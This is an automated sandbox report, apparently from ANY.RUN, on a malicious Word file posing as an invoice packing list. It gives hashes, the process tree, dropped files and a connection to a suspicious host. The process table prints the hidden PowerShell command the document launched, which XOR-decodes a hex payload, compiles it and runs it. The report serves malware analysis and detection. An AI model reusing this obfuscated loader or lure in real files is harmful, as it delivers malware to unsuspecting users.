File name: | PACKING%20LIST%20OF%20INVOICE%20No%201616OC#3900446194556,%20INVOICE%20No%20#1617OC#3907778806155567899.doc |
Full analysis: | https://app.any.run/tasks/be406768-6899-476b-a51b-ae3720de2f47 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 13:50:25 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Title: rc734, Subject: q71e1, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jul 18 08:55:00 2019, Last Saved Time/Date: Thu Jul 18 08:55:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | AF18F392710B8844CBEA3A252FBA0789 |
SHA1: | EE1382CC5B9DB78C97EF5CED9BECFCAD845D83F4 |
SHA256: | 5C98254D7F7AFC0DEA5C13CEE3E203C7C42524FF5EBE35C6DB14D43C1B9D4E36 |
SSDEEP: | 12288:NFfDH2JexyhrAopDEPoqHw22rqxMaA58ewtfjH2JexYhrAoDDEPoq:rbcemAou/lAqOaA58eG7ceoAo8/ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | rc734 |
---|---|
Subject: | q71e1 |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:07:18 07:55:00 |
ModifyDate: | 2019:07:18 07:55:00 |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Bytes: | 11000 |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 1 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | rc734 |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3844 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\9026ad35-3ea7-4c3d-8667-e302021e96ac.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3880 | powershell -WindowStyle Hidden function mca72 { param($d5863) $ce12ff7 = 'nc5469';$hf8f51 = ''; for ($i = 0; $i -lt $d5863.length; $i+=2) { $m44642 = [convert]::ToByte($d5863.Substring($i, 2), 16); $hf8f51 += [char]($m44642 -bxor $ce12ff7[($i / 2) % $ce12ff7.length]); } return $hf8f51; } $ufea4 = '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'; $ufea42 = mca72($ufea4); Add-Type -TypeDefinition $ufea42; [zeebc]::faabe(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1532 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\pt-mvjyi.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3548 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES4CF.tmp" "c:\Users\admin\AppData\Local\Temp\CSC4CE.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF732.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4QZQZ6XK39578HXJI46R.temp | — | |
MD5:— | SHA256:— | |||
3880 | powershell.exe | C:\Users\admin\AppData\Local\Temp\pt-mvjyi.0.cs | — | |
MD5:— | SHA256:— | |||
3880 | powershell.exe | C:\Users\admin\AppData\Local\Temp\pt-mvjyi.cmdline | — | |
MD5:— | SHA256:— | |||
1532 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC4CE.tmp | — | |
MD5:— | SHA256:— | |||
1532 | csc.exe | C:\Users\admin\AppData\Local\Temp\pt-mvjyi.pdb | — | |
MD5:— | SHA256:— | |||
3548 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES4CF.tmp | — | |
MD5:— | SHA256:— | |||
1532 | csc.exe | C:\Users\admin\AppData\Local\Temp\pt-mvjyi.dll | — | |
MD5:— | SHA256:— | |||
1532 | csc.exe | C:\Users\admin\AppData\Local\Temp\pt-mvjyi.out | — | |
MD5:— | SHA256:— | |||
3844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F398155.emf | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3880 | powershell.exe | 37.187.19.227:443 | plik.root.gg | OVH SAS | FR | suspicious |
Domain | IP | Reputation |
---|---|---|
plik.root.gg | | suspicious |
dns.msftncsi.com | | shared |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|